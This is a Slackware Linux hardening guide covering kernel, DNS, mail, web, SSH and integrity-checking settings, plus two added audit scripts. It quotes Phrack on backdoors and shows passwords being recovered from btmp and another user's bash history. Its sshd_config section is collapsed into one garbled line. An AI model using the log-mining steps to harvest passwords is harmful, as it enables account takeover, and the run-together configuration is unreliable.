vm.kswapd = 512 32 32
# Enables/Disables memory over commitment
vm.overcommit_memory = 0
# Increases number of page tables kept in a per-processor cache
vm.pagetable_cache = 25 50
# Increase limit of file-handles
fs.file-max = 8192
# Enable/Disable ignoring ping request
net.ipv4.icmp_echo_ignore_all = 1
# Enable/Disable ignoring broadcasts request
net.ipv4.icmp_ignore_broadcasts = 1
# Enable/Disable IP source routing
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0
# Enable/Disable TCP SYN cookie protection
net.ipv4.tcp_syncookies = 1
# Enable/Disable ICMP redirect acceptance
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
# Enable/Disable bad error message protection
net.ipv4.icmp_ignore_bogus_error_responses = 1
# Enable/Disable IP spoofing protection
net.ipv4.conf.all.rp_filter = 2
net.ipv4.conf.default.rp_filter = 2
# Enable/Disable logging of spoofed, source routed and redirect packets
net.ipv4.conf.all.log_martians = 1
net.ipv4.conf.default.log_martians = 1
# Improve shared memory size
kernel.shmall = 134217728
kernel.shmmax = 134217728
# Improve default and maximum window sizes
net.core.vmem_max = 2048000
net.core.vmem_default = 204800
# Enable/Disable packet forwarding
net.ipv4.ip_forward = 0
# Change the default TTL to help obscure OS fingerprinting
net.ipv4.ip_default_ttl = 128

root@darkstar:~# sysctl -p /etc/sysctl.conf
root@darkstar:~# sysctl -A

There is already an entry in /etc/rc.d/rc.S that applies the sysctl settings located in this file during bootup.
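Several keys in the listing above are not present on the 2.6 kernel that Slackware 13.1 ships (vm.bdflush, vm.kswapd and vm.pagetable_cache are 2.4-series keys, and net.core has rmem/wmem limits but no vmem_*), so sysctl -p reports them as unknown and skips them. The following added check, which is not part of the original document, tests each key in a sysctl.conf-style file against the /proc/sys tree so that misspelled or obsolete keys show up before rc.S tries to apply them; the second argument and the sample tree exist only so it can run on constructed data.

```shell
#!/bin/sh
# Added example, not from the original document: check every key in a
# sysctl.conf-style file against the /proc/sys tree before "sysctl -p" (or
# rc.S at boot) tries to apply it, so a misspelled or obsolete key is
# reported up front. The optional second argument replaces /proc/sys so
# the check can be exercised on a constructed tree.

# Print each key that has no matching entry under the base directory.
# Returns 0 when every key resolves, 1 otherwise.
check_sysctl_keys() {
    conf=$1
    base=${2:-/proc/sys}
    bad=0
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line%%#*}                       # drop comments
        key=$(printf '%s' "$line" |
              sed -n 's/^[[:space:]]*\([^=[:space:]][^=[:space:]]*\)[[:space:]]*=.*$/\1/p')
        [ -n "$key" ] || continue              # blank or malformed line
        # sysctl accepts "a.b.c" and "a/b/c"; both map to a path under the
        # base. (Keys whose own components contain dots, such as
        # net.ipv4.conf.eth0.0, are not handled here.)
        path=$(printf '%s' "$key" | tr . /)
        if [ ! -e "$base/$path" ]; then
            printf 'unknown key: %s\n' "$key"
            bad=1
        fi
    done < "$conf"
    return $bad
}

# Constructed sysctl fragment: two valid keys and one misspelled key.
SAMPLE_CONF='# constructed sample
net.ipv4.conf.all.log_martians = 1
net.ipv4.conf.default.log_martions = 1
net.ipv4.tcp_syncookies = 1
'

# Constructed stand-in for /proc/sys that contains only the real keys.
make_fake_sysfs() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/net/ipv4/conf/all" "$d/net/ipv4/conf/default"
    : > "$d/net/ipv4/conf/all/log_martians"
    : > "$d/net/ipv4/conf/default/log_martians"
    : > "$d/net/ipv4/tcp_syncookies"
    printf '%s\n' "$d"
}

# Run the check on the constructed sample: prints the unknown keys and
# returns the check's status (1 here, because of the misspelled key).
check_sample() {
    base=$(make_fake_sysfs) || return 1
    conf=$(mktemp) || return 1
    printf '%s' "$SAMPLE_CONF" > "$conf"
    if check_sysctl_keys "$conf" "$base"; then rc=0; else rc=1; fi
    rm -rf "$base" "$conf"
    return $rc
}
```

Against a live system, `check_sysctl_keys /etc/sysctl.conf` (no second argument) uses the real /proc/sys.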
man sysctl
man sysctl.conf

/etc/rc.d/rc.modules:

List the kernel modules that are loaded during bootup. Comment out the ones you feel are unnecessary.

root@darkstar:~# grep -v "^#\|^$" /etc/rc.d/rc.modules

Grsecurity:

TODO

Remove support for kernel modules:

From Phrack 25-5, "Unix Cracking Tips":

"After you gain superuser privileges and you wish to stay root, here are a few suggestions for installing backdoors:
. . .
- Install new system calls
. . ."

Then read Phrack 52-8, "Weakening the Linux Kernel". Then compile your kernel to remove support for modules.

CONFIG_MODULES=n

----[ Misc Stuff ]----

/etc/inputrc:

set bell-style none
set mark-directories on
set mark-modified-lines on
set match-hidden-files on
set show-all-if-ambiguous on
set visible-stats on

man bash
man readline

Stuff to remove:

root@darkstar:~# removepkg nn
root@darkstar:~# removepkg slrn
root@darkstar:~# removepkg uucp
root@darkstar:~# removepkg strace
root@darkstar:~# removepkg gdb
root@darkstar:~# removepkg nc
root@darkstar:~# removepkg nmap
root@darkstar:~# removepkg at

This list should be much longer.

/etc/rc.d/rc.local:

# This is hard drive specific, your settings will vary
/usr/sbin/hdparm -c3 -a16 -W1 -u1 /dev/hdb
# Turn on NumLock
/usr/bin/setleds -D +num

Make a backup of commonly trojaned commands:

Only do this after a fresh install. Making copies of already trojaned commands will just ruin your day. If you don't have a fresh install, copy the commands from the "Live" CD that comes with the official version of Slackware.
root@darkstar:~# mkdir bin

Copy the following to /root/bin:

/bin/date
/bin/du
/bin/echo
/bin/grep
/bin/kill
/bin/killall
/bin/login
/bin/ls
/bin/netstat
/bin/ps
/bin/su
/bin/tar
/sbin/agetty
/sbin/explodepkg
/sbin/getty
/sbin/ifconfig
/sbin/installpkg
/sbin/makepkg
/sbin/pidof
/sbin/removepkg
/sbin/upgradepkg
/usr/bin/basename
/usr/bin/biff
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/dirname
/usr/bin/env
/usr/bin/find
/usr/bin/lsattr
/usr/bin/nail
/usr/bin/passwd
/usr/bin/pstree
/usr/bin/ssh
/usr/bin/top
/usr/bin/traceroute
/usr/bin/write
/usr/sbin/gpm
/usr/sbin/hdparm
/usr/sbin/in.fingerd
/usr/sbin/in.identd
/usr/sbin/in.rlogind
/usr/sbin/in.rshd
/usr/sbin/in.telnetd
/usr/sbin/in.timed
/usr/sbin/inetd
/usr/sbin/ipop3d
/usr/sbin/named
/usr/sbin/rpcinfo
/usr/sbin/sendmail
/usr/sbin/sshd
/usr/sbin/syslogd
/usr/sbin/tcpd

root@darkstar:~# cd bin
root@darkstar:~/bin# md5sum * >> md5sum
root@darkstar:~/bin# cd
root@darkstar:~# tar zcvf bin.tar.gz ./bin
root@darkstar:~# cp bin.tar.gz /mnt/thumb

It would be a good idea to run `chattr +i ...` on all of the original files.

Passwords in logs and history files:

It's not uncommon for someone to make a mistake while logging in or switching users and type the password in the wrong place. Be aware that "dumpster diving" in system logs and other users' history files is a common practice by evil doers to obtain passwords. Keep this in mind when deciding to store 6 months worth of logs or when setting HISTFILESIZE to a $LARGENUMBER.

This is lastb output on a Slackware 11.0 system:

root@darkstar:~# lastb
P@ssw0rd1!   Fri Jun 23 19:04 - 19:04  (00:00)
dentonj      Fri Jun 23 19:03 - 19:03  (00:00)

The output of lastb is different in Slackware 13.1, with long usernames being truncated.
root@darkstar:~# lastb
mysupers   tty3   Sun Aug 18 15:35 - 15:35  (00:00)
dentonj    tty3   Sun Aug 18 13:16 - 13:16  (00:00)
root@darkstar:~# strings /var/log/btmp | grep mysupers
mysupersecretpassword
root@darkstar:~# less /home/dentonj/.bash_history
<contents of .bash_history>
/us      <-- type this to search for "us"
. . .
us - !QAZzaq1
. . .

/etc/wgetrc:

Ignore the robots.txt file on web servers.

robots = off

----[ Program Hardening ]----

/usr/sbin/atalkd:

TODO

/etc/netatalk/atalkd.conf:
/etc/netatalk/afpd.conf:
/etc/netatalk/AppleVolumes.default:
/etc/netatalk/AppleVolumes.system:
/etc/netatalk/netatalk.conf:
/etc/netatalk/papd.conf:

man afpd
man afpd.conf
man AppleVolumes.default
man atalkd
man atalkd.conf
man netatalk.conf
man papd

/usr/sbin/named:

/etc/named.conf:

acl "allowed" {
    localhost;
    192.168.1.0/24;
};

acl "denied" {
    0.0.0.0/8; 1.0.0.0/8; 2.0.0.0/8; 5.0.0.0/8; 7.0.0.0/8; 10.0.0.0/8;
    23.0.0.0/8; 27.0.0.0/8; 31.0.0.0/8; 36.0.0.0/8; 37.0.0.0/8; 39.0.0.0/8;
    42.0.0.0/8; 49.0.0.0/8; 50.0.0.0/8; 92.0.0.0/8; 93.0.0.0/8; 94.0.0.0/8;
    95.0.0.0/8; 100.0.0.0/8; 101.0.0.0/8; 102.0.0.0/8; 103.0.0.0/8;
    104.0.0.0/8; 105.0.0.0/8; 106.0.0.0/8; 107.0.0.0/8; 108.0.0.0/8;
    109.0.0.0/8; 110.0.0.0/8; 111.0.0.0/8; 112.0.0.0/8; 113.0.0.0/8;
    114.0.0.0/8; 115.0.0.0/8; 116.0.0.0/8; 117.0.0.0/8; 118.0.0.0/8;
    119.0.0.0/8; 120.0.0.0/8; 169.254.0.0/16; 172.16.0.0/12; 173.0.0.0/8;
    174.0.0.0/8; 175.0.0.0/8; 176.0.0.0/8; 177.0.0.0/8; 178.0.0.0/8;
    179.0.0.0/8; 180.0.0.0/8; 181.0.0.0/8; 182.0.0.0/8; 183.0.0.0/8;
    184.0.0.0/8; 185.0.0.0/8; 186.0.0.0/8; 187.0.0.0/8; 192.0.2.0/24;
    //192.168.0.0/16;
    197.0.0.0/8; 223.0.0.0/8; 224.0.0.0/3;
};

key "rndc-key" {
    algorithm hmac-md5;
    secret "Thisisafakekey==";
};

controls {
    inet 127.0.0.1 port 953 allow { 127.0.0.1; } keys { "rndc-key"; };
};

options {
    directory "/var/named";
    pid-file "/var/named/named.pid";
    statistics-file "/var/named/named.stats";
    memstatistics-file "/var/named/named.memstats";
    dump-file "/var/named/named.dump";
    zone-statistics yes;
    transfer-format many-answers;
    interface-interval 0;
    allow-transfer { none; };
    allow-query { allowed; };
    allow-recursion { allowed; };
    blackhole { denied; };
    tcp-clients 32;
    forwarders { 1.2.3.4; 5.6.7.8; };
    version none;
    hostname none;
    rfc2308-type1 no;
};

logging {
    channel default_syslog {
        syslog daemon;
        severity info;
        stderr;
        print-category yes;
        print-severity yes;
    };
    channel query_log {
        file "/var/log/named.queries" versions 6 size 20m;
        severity info;
        print-time yes;
        print-category yes;
        print-severity yes;
    };
    category default { default_syslog; };
    category general { default_syslog; };
    category security { default_syslog; };
    category config { default_syslog; };
    category resolver { default_syslog; };
    category xfer-in { default_syslog; };
    category xfer-out { default_syslog; };
    category notify { default_syslog; };
    category client { default_syslog; };
    category network { default_syslog; };
    category update { default_syslog; };
    category update-security { default_syslog; };
    category lame-servers { default_syslog; };
    category queries { query_log; };
    category database { default_syslog; };
    category unmatched { default_syslog; };
    category dispatch { default_syslog; };
    category dnssec { default_syslog; };
    category delegation-only { default_syslog; };
};

zone "." IN {
    type hint;
    file "caching-example/named.ca";
};

zone "localhost" IN {
    type master;
    file "caching-example/named.local";
    allow-update { none; };
    notify no;
};

zone "0.0.127.in-addr.arpa" IN {
    type master;
    file "caching-example/named.local";
    allow-update { none; };
    notify no;
};

/etc/rndc.conf:

key "rndc-key" {
    algorithm hmac-md5;
    secret "Thisisafakekey==";
};

options {
    default-key "rndc-key";
    default-server 127.0.0.1;
    default-port 953;
};

root@darkstar:~# groupadd -g 53 named
root@darkstar:~# useradd -c "BIND" -d /var/named -g 53 -u 53 \
    -s /bin/false named
root@darkstar:~# dig @a.root-servers.net . ns > \
    /var/named/caching-example/named.ca
root@darkstar:~# chmod 600 /etc/named.conf
root@darkstar:~# chown named.named /etc/named.conf
root@darkstar:~# chmod 600 /etc/rndc.conf
root@darkstar:~# chown named.named /etc/rndc.conf
root@darkstar:~# chown -R named.named /var/named/
root@darkstar:~# chown named.named /var/run/named/

/etc/rc.d/rc.bind:

/usr/sbin/named -u named

To generate the keys for rndc:

root@darkstar:~# rndc-confgen -b 512

To check the configuration:

root@darkstar:~# named-checkconf -z
zone localhost/IN: loaded serial 42
zone 0.0.127.in-addr.arpa/IN: loaded serial 1997022700
root@darkstar:~# named-checkzone localhost \
    /var/named/caching-example/localhost.zone
zone localhost/IN: loaded serial 42
OK
root@darkstar:~# named-checkzone 0.0.127.in-addr.arpa \
    /var/named/caching-example/named.local
zone 0.0.127.in-addr.arpa/IN: loaded serial 1997022700
OK
root@darkstar:~# named-checkzone . /var/named/caching-example/named.ca
zone ./IN: has 0 SOA records
root@darkstar:~# chmod 700 /etc/rc.d/rc.bind
root@darkstar:~# /etc/rc.d/rc.bind start
root@darkstar:~# rndc status

man named
man named-checkconf
man named-checkzone
man rndc
man rndc.conf
man rndc-confgen
man lwresd

dentonj@darkstar:~$ links /usr/doc/bind-9.3.2-P1/arm/Bv9ARM.html

The above example sets up BIND as a caching only DNS server. "Explain benefits."

The problem with this setup is that you are running a daemon that isn't entirely necessary. Unnecessary services can potentially provide an attacker with more information than they should have, or they can provide an attacker with a way to break into your system. Unless you are setting up a caching name server as a way of learning how to set up and run BIND, you are better off removing BIND from the system. One of the problems with removing the BIND package on Slackware is that the useful commands "dig", "host", and "nslookup" will also be removed.
root@darkstar:~# removepkg bind

TODO - Chroot

/usr/sbin/sendmail:

/etc/mail/sendmail.cf:

#O DontBlameSendmail=Safe
O MaxHopCount=25
O HelpFile=/etc/issue.net
O ForwardPath=/etc/forward
O LogLevel=15
#O DaemonPortOptions=Name=MTA
#O DaemonPortOptions=Port=587,Name=MSA,M=E
O DaemonPortOptions=Address=127.0.0.1
O ClientPortOptions=Family=inet,Address=127.0.0.1
O PrivacyOptions=goaway,noreceipts,restrictmailq,restrictqrun,restrictexpand,noetrn,nobodyreturn
O Timeout.ident=0
O SmtpGreetingMessage=$j Unauthorized Access Prohibited.
O AllowBogusHELO=False
O UnsafeGroupWrites=True
O RrtImpliesDSN=False
$.by $j with id $i$?{tls_version}

root@darkstar:~# touch /etc/forward

$HOME/.forward:

The .forward file allows users to easily forward email. However, the file can also be used to run a program every time an email is received. There are several ways to disable use of the .forward file.

Set the ForwardPath option so that it points to something other than the default. The option has to be set to something, otherwise sendmail sets ForwardPath to $HOME/.forward.

O ForwardPath=/etc/forward

You can allow programs to be run, but restrict which ones can be run by using smrsh.

You can disable forwarding in sendmail altogether. However, the bat book warns that Bad Things(TM) can happen if you completely disable forwarding. Remove the "w" flag from the line located in /etc/mail/sendmail.cf:

Mlocal, P=/usr/bin/procmail, F=lsDFMAw5:/|@qSPfhn9, S=.....
Mlocal, P=/usr/bin/procmail, F=lsDFMA5:/|@qSPfhn9, S=.....

You can try to have root create and own the .forward file in each of the users' home directories. But the user can move the .forward file and create a new file.

root@darkstar:~# touch /home/dentonj/.forward
dentonj@darkstar:~$ ls -l .forward
-rw-r--r-- 1 root root 0 2001-06-27 20:17 .forward
dentonj@darkstar:~$ mv .forward .forward.moved
dentonj@darkstar:~$ ls -l .forward.moved
-rw-r--r-- 1 root root 0 2001-06-27 20:17 .forward.moved

However, making the file immutable stops this.
root@darkstar:~# touch /home/dentonj/.forward
root@darkstar:~# chattr +i /home/dentonj/.forward
root@darkstar:~# lsattr /home/dentonj/.forward
----i-------- /home/dentonj/.forward
root@darkstar:~# chmod go-rwx /usr/bin/chattr /usr/bin/lsattr
dentonj@darkstar:~$ ls -l .forward
-rw-r--r-- 1 root root 0 2001-06-27 20:19 .forward
dentonj@darkstar:~$ mv .forward .forward.moved
mv: cannot move `.forward' to `.forward.moved': Operation not permitted

/usr/sbin/smrsh:

TODO

/etc/mail/aliases:

I used to comment out most of these. Now I'm more interested in whether someone actually tries to send email to any of them.

postmaster: root, dentonj
bin: root, dentonj
daemon: root, dentonj
games: root, dentonj
ingres: root, dentonj
nobody: root, dentonj
system: root, dentonj
toor: root, dentonj
uucp: root, dentonj
manager: root, dentonj
dumper: root, dentonj
webmaster: root, dentonj
abuse: root, dentonj
decode: root, dentonj

Add any additional system accounts present in /etc/passwd:

admin: root, dentonj
ftp: root, dentonj
mail: root, dentonj
mysql: root, dentonj
smmsp: root, dentonj
sshd: root, dentonj

root@darkstar:~# newaliases

man aliases
man newaliases

If you only need to run sendmail for local mail, use cron.
root@darkstar:~# /etc/rc.d/rc.sendmail stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.sendmail

/etc/cron.hourly/mqueue:

#!/bin/sh
/usr/sbin/sendmail -q

root@darkstar:~# chmod 700 /etc/cron.hourly/mqueue

man crond

/usr/sbin/httpd:

root@darkstar:~# groupadd -g 80 http
root@darkstar:~# useradd -u 80 -g 80 http

/etc/apache/httpd.conf:

#LoadModule includes_module libexec/apache/mod_include.so
#LoadModule autoindex_module libexec/apache/mod_autoindex.so
#LoadModule speling_module libexec/apache/mod_speling.so
#LoadModule userdir_module libexec/apache/mod_userdir.so
#LoadModule anon_auth_module libexec/apache/mod_auth_anon.so
#LoadModule digest_module libexec/apache/mod_digest.so
#LoadModule proxy_module libexec/apache/mod_proxy.so
#LoadModule cern_meta_module libexec/apache/mod_cern_meta_module.so
#LoadModule usertrack_module libexec/apache/mod_usertrack.so
#LoadModule unique_id_module libexec/apache/mod_unique_id.so

#AddModule mod_includes.c
#AddModule mod_autoindex.c
#AddModule mod_speling.c
#AddModule mod_userdir.c
#AddModule mod_auth_anon.c
#AddModule mod_digest.c
#AddModule mod_proxy.c
#AddModule mod_cern_meta.c
#AddModule mod_usertrack.c
#AddModule mod_unique_id.c

User http
Group http
ServerAdmin root@localhost

<Directory "/var/www/htdocs">
    Options FollowSymLinks MultiViews

UseCanonicalName Off
LogLevel info
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T"
CustomLog /var/log/apache/access_log combined
ServerSignature Off
ServerTokens ProductOnly

<Directory "/var/www/icons">
    Options MultiViews

#Alias /manual/ "/var/www/htdocs/manual/"
#<Directory "/var/www/htdocs/manual">
#    Options Indexes FollowSymLinks MultiViews
#    AllowOverride None
#    Order allow,deny
#    Allow from all
#</Directory>

#ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
#<Directory "/var/www/cgi-bin">
#    AllowOverride None
#    Options None
#    Order allow,deny
#    Allow from all
#</Directory>

# /etc/logrotate.d/httpd:
# /var/log/apache/access_log /var/log/apache/error_log {
#     create 0640 root root
#     mail dentonj@gmail.com
#     mailfirst
#     sharedscripts
#     postrotate
#         /bin/kill -HUP `cat /var/run/httpd.pid \
#             2> /dev/null || true`
#     endscript
# }

/etc/logrotate.d/httpd:

/var/log/httpd/*_log {
    rotate 26
    notifempty
    size=5M
    compress
    delaycompress
    sharedscripts
    postrotate
        /etc/rc.d/rc.httpd restart
    endscript
}

dentonj@darkstar:~$ links /var/www/htdocs/manual/misc/security_tips.html

PHP:

Fortunately, PHP is disabled by default. But if you insist on letting the script kiddies have free rein of your system, there are a few things you can do to slow them down.

/etc/apache/httpd.conf:

Include /etc/apache/mod_php.conf

/etc/apache/php.ini:

display_errors = Off
log_errors = On
error_log = /var/log/apache/php_errors
register_globals = Off
variables_order = "ES"
expose_php = Off
allow_url_fopen = Off
open_basedir = /var/www
disable_functions = system,exec,shell_exec,eval,include,require,include_once,require_once,preg_replace
safe_mode = On
safe_mode_include_dir = /usr/php/include
safe_mode_exec_dir = /usr/php/bin
safe_mode_gid = On
safe_mode_allowed_env_vars = PHP_
safe_mode_protected_env_vars = LD_LIBRARY_PATH

Note that eval, include, require, include_once and require_once are language constructs rather than functions, so listing them in disable_functions has no effect on them.

root@darkstar:~# touch /var/log/apache/php_errors
root@darkstar:~# mkdir -p /usr/php/include
root@darkstar:~# mkdir /usr/php/bin

man httpd
man php

/etc/ssh/ssh_config:

# Host *
ForwardAgent no
ForwardX11 no
RhostsRSAAuthentication no
RSAAuthentication no
PasswordAuthentication yes
HostbasedAuthentication no
BatchMode no
CheckHostIP yes
AddressFamily any
ConnectTimeout 0
StrictHostKeyChecking ask
# IdentityFile ~/.ssh/identity
IdentityFile ~/.ssh/id_rsa
IdentityFile ~/.ssh/id_dsa
Port 22
Protocol 2
# Cipher 3des
# Ciphers aes256-cbc,aes256-ctr
EscapeChar ~
Compression yes
HashKnownHosts yes
EnableSSHKeysign no
LogLevel DEBUG
PubkeyAuthentication yes
ServerAliveInterval 60
ServerAliveCountMax 10
TCPKeepAlive no
UserKnownHostsFile ~/.ssh/known_hosts

/etc/ssh/sshd_config:

Port 22
Protocol 2
AddressFamily inet
ListenAddress 192.168.1.2
# HostKey for protocol version 1
#HostKey /etc/ssh/ssh_host_key # HostKeys for protocol version 2 HostKey /etc/ssh/ssh_host_rsa_key HostKey /etc/ssh/ssh_host_dsa_key # Lifetime and size of ephemeral version 1 server key #KeyRegenerationInterval 1h #ServerKeyBits 768 # Logging # obsoletes QuietMode and FascistLogging SyslogFacility AUTH LogLevel DEBUG # Authentication: LoginGraceTime 2m PermitRootLogin no StrictModes yes MaxAuthTries 6 AllowUsers dentonj@trustedhost AllowGroups wheel RSAAuthentication no PubkeyAuthentication yes AuthorizedKeysFile .ssh/authorized_keys # For this to work you will also need host keys in /etc/ssh/ssh_known_hosts RhostsRSAAuthentication no # similar for protocol version 2 HostbasedAuthentication no # Change to yes if you don't trust ~/.ssh/known_hosts for # RhostsRSAAuthentication and HostbasedAuthentication IgnoreUserKnownHosts no # Don't read the user's ~/.rhosts and ~/.shosts files IgnoreRhosts yes # To disable tunneled clear text passwords, change to no here! PasswordAuthentication no PermitEmptyPasswords no # Change to no to disable s/key passwords #ChallengeResponseAuthentication yes # Kerberos options #KerberosAuthentication no #KerberosOrLocalPasswd yes #KerberosTicketCleanup yes #KerberosGetAFSToken no # GSSAPI options #GSSAPIAuthentication no #GSSAPICleanupCredentials yes #UsePAM no AllowTcpForwarding yes GatewayPorts no X11Forwarding no X11DisplayOffset 10 X11UseLocalhost yes PrintMotd yes PrintLastLog yes TCPKeepAlive no UseLogin no UsePrivilegeSeparation yes PermitUserEnvironment no Compression delayed ClientAliveInterval 60 ClientAliveCountMax 10 UseDNS yes PidFile /var/run/sshd.pid #MaxStartups 10 # no default banner path Banner /etc/issue.net # override default of no subsystems #Subsystem sftp /usr/libexec/sftp-server # Ciphers aes256-cbc,aes256-ctr # login.conf(5) is not used in Slackware ChallengeResponseAuthentication no root@darkstar:~# chmod u-s /usr/libexec/ssh-keysign man ssh man sshd man ssh_config man sshd_config /etc/ssh/sshrc: TODO 
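Because sshd keeps the first occurrence of each keyword, a hand-edited file like the one above is easy to get subtly wrong: a stray "PermitRootLogin yes" near the top quietly wins over the "no" you add at the bottom. The following is an added example, not part of the original document and not an OpenSSH tool: a small POSIX sh audit that parses an sshd_config the way sshd does (first match wins, case-insensitive keywords, whitespace or "=" as separator, global section only) and checks the key-only, no-root settings used above. The two sample configs it writes are constructed for the demonstration and describe no real host.

```shell
#!/bin/sh
# Added example, not from the original document: audit an sshd_config against
# the key-only, no-root settings used above. Needs only POSIX sh, awk, tr and
# mktemp.

# Print the effective value of directive $2 in config $1. sshd keeps the
# FIRST uncommented occurrence of a keyword and ignores later ones. Keywords
# are case-insensitive and may be separated from the value by whitespace or
# "=". Only the global section is read: directives after a "Match" line are
# conditional and are skipped.
sshd_directive() {
    awk -v want="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
        { line = $0; sub(/^[ \t]+/, "", line) }
        line == "" || line ~ /^#/ { next }
        {
            match(line, /^[^ \t=]+/)
            key = tolower(substr(line, 1, RLENGTH))
            value = substr(line, RLENGTH + 1)
            sub(/^[ \t=]+/, "", value)
            sub(/[ \t]+$/, "", value)
        }
        key == "match" { exit }
        key == want    { print value; exit }
    ' "$1"
}

# PASS/FAIL one directive ($2) against the wanted value ($3). An absent
# directive FAILS on purpose: the built-in default differs between OpenSSH
# versions, so a hardening setting should be stated, not assumed.
sshd_check() {
    chk_actual=$(sshd_directive "$1" "$2" | tr 'A-Z' 'a-z')
    chk_want=$(printf '%s' "$3" | tr 'A-Z' 'a-z')
    if [ -n "$chk_actual" ] && [ "$chk_actual" = "$chk_want" ]; then
        echo "PASS $2 $chk_actual"
        return 0
    fi
    echo "FAIL $2 '${chk_actual:-(not set)}' (want $3)"
    return 1
}

# Run every check and return the number of failures (0 = clean).
sshd_audit() {
    fails=0
    for pair in Protocol=2 PermitRootLogin=no PasswordAuthentication=no \
                PermitEmptyPasswords=no ChallengeResponseAuthentication=no \
                HostbasedAuthentication=no IgnoreRhosts=yes X11Forwarding=no \
                PermitUserEnvironment=no UsePrivilegeSeparation=yes \
                StrictModes=yes PubkeyAuthentication=yes; do
        sshd_check "$1" "${pair%%=*}" "${pair#*=}" || fails=$((fails + 1))
    done
    return "$fails"
}

# Constructed sample configs (no real host): $1 is "weak" or "hardened".
# Prints the path of a temp file holding the config.
make_sample_config() {
    smp_file=$(mktemp) || return 1
    if [ "$1" = weak ]; then
        cat > "$smp_file" <<'EOF'
# stock-looking file where a few lines were uncommented in a hurry
Protocol 2,1
PermitRootLogin yes
PasswordAuthentication yes
X11Forwarding yes
# this later "no" does NOT override the first value above
PermitRootLogin no
EOF
    else
        cat > "$smp_file" <<'EOF'
Protocol 2
PermitRootLogin no
StrictModes yes
PubkeyAuthentication yes
HostbasedAuthentication no
IgnoreRhosts yes
PasswordAuthentication=no
PermitEmptyPasswords no
X11Forwarding no
UsePrivilegeSeparation yes
PermitUserEnvironment no
ChallengeResponseAuthentication no
Match User backup
    PasswordAuthentication yes
EOF
    fi
    echo "$smp_file"
}

weak=$(make_sample_config weak)
hardened=$(make_sample_config hardened)
echo "== weak sample ==";     sshd_audit "$weak"     || echo "$? failure(s)"
echo "== hardened sample =="; sshd_audit "$hardened" && echo "clean"
rm -f "$weak" "$hardened"
```

On the live host, point sshd_audit at /etc/ssh/sshd_config, or at the output of sshd -T, which prints the configuration sshd actually loaded (one lowercase "keyword value" line per directive, which the parser above accepts). The Match block in the hardened sample is deliberately ignored by the audit: settings inside Match apply only to the matched users, and judging them needs the matching criteria, not just the values.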
/usr/bin/mysqld_safe:
TODO

root@darkstar:~# less /var/lib/mysql/darkstar.err

man mysql_fix_privilege_tables

NFS:
root@darkstar:~# removepkg nfs-utils

NIS:
root@darkstar:~# removepkg yptools

----[ Security Programs/Scripts ]----

GnuPG:
On the Slackware Source CD 3:
mount /mnt/cdrom
cd /mnt/cdrom/testing/packages
installpkg gnupg-1.4.2-i486-1.tgz

libsafe:
On the Slackware Source CD 3:
mount /mnt/cdrom
cd /mnt/cdrom/extra/libsafe-2.0.16
installpkg libsafe-2.0.16-i386-1.tgz

Snort:
http://www.snort.org
TODO

sXid:
http://packages.debian.org/stable/source/sxid
root@darkstar:~# cp sxid_4.0.5.tar.gz src
root@darkstar:~# cd src
root@darkstar:~/src# gzip -cd sxid_4.0.5.tar.gz | tar xvf -
root@darkstar:~/src# cd sxid-4.0.5
root@darkstar:~/src/sxid-4.0.5# less README
root@darkstar:~/src/sxid-4.0.5# make install

/usr/local/etc/sxid.conf:
ALWAYS_NOTIFY = "yes"
ALWAYS_ROTATE = "yes"
IGNORE_DIRS = ""

/etc/cron.daily/sxid:
#!/bin/sh
/usr/local/bin/sxid

root@darkstar:~# chmod 700 /etc/cron.daily/sxid
root@darkstar:~# sxid

chkrootkit:
http://www.chkrootkit.org
root@darkstar:~# cp chkrootkit_0.46a.tar.gz src/
root@darkstar:~# cd src
root@darkstar:~/src# gzip -cd chkrootkit_0.46a.tar.gz | tar xvf -
root@darkstar:~/src# cd chkrootkit-0.46a
root@darkstar:~/src/chkrootkit-0.46a# less README
root@darkstar:~/src/chkrootkit-0.46a# make sense

Copy the following to /usr/local/sbin:
    check_wtmpx chkdirs chklastlog chkproc chkrootkit chkutmp chkwtmp
    ifpromisc strings-static

root@darkstar:~# crontab -e
# Chkrootkit, results are mailed to root
10 4 * * * ( cd /usr/local/sbin && ./chkrootkit 2>&1 )
root@darkstar:~# killall -HUP crond

aide:
http://sourceforge.net/project/aide
TODO

lcap:
root@darkstar:~# cp lcap_0.0.6.orig.tar.gz src/
root@darkstar:~# cd src
root@darkstar:~/src# gzip -cd lcap_0.0.6.orig.tar.gz | tar xvf -
root@darkstar:~/src# cd lcap-0.0.6/
root@darkstar:~/src/lcap-0.0.6# less README
root@darkstar:~/src/lcap-0.0.6# make
root@darkstar:~/src/lcap-0.0.6# strip lcap
root@darkstar:~/src/lcap-0.0.6# cp lcap /usr/local/sbin

----[ Usability/Reducing Security ]----

Run X applications as root:

The Linux Security Cookbook contains a short script that will set DISPLAY
and XAUTHORITY to allow root to run X apps. Or you can cheat by setting
DISPLAY and HOME to accomplish the same thing (DISPLAY has to be exported,
or xv never sees it):

root@darkstar:~# xv
xv: Can't open display
root@darkstar:~# export DISPLAY=:0.0
root@darkstar:~# xv
Xlib: connection to ":0.0" refused by server
Xlib: Invalid MIT-MAGIC-COOKIE-1 key
xv: Can't open display
root@darkstar:~# HOME=/home/dentonj
root@darkstar:~# xv

A better way is to use xauth and copy the user's MIT-MAGIC-COOKIE into
root's own .Xauthority:

root@darkstar:~# xauth -f /home/dentonj/.Xauthority extract - :0 | \
    xauth merge -
root@darkstar:~# xauth list
darkstar/unix:0  MIT-MAGIC-COOKIE-1  abcdef0123456789abcdef0123456789
dentonj@darkstar:~$ xauth list
darkstar/unix:0  MIT-MAGIC-COOKIE-1  abcdef0123456789abcdef0123456789
localhost:0  MIT-MAGIC-COOKIE-1  9876543219fedcba9876543210fedcba

You still have to set DISPLAY for root. Be aware that setting DISPLAY in a
shell config file (e.g. /etc/profile) may cause problems with X forwarding
in ssh.

man xauth
man Xsecurity

/usr/bin/lessopen.sh:

I like to dig around inside of binaries. Uncomment the following lines:

    *) FILE=`file -L "$1"` ;
       # Check to see if binary, if so -- view with 'strings'
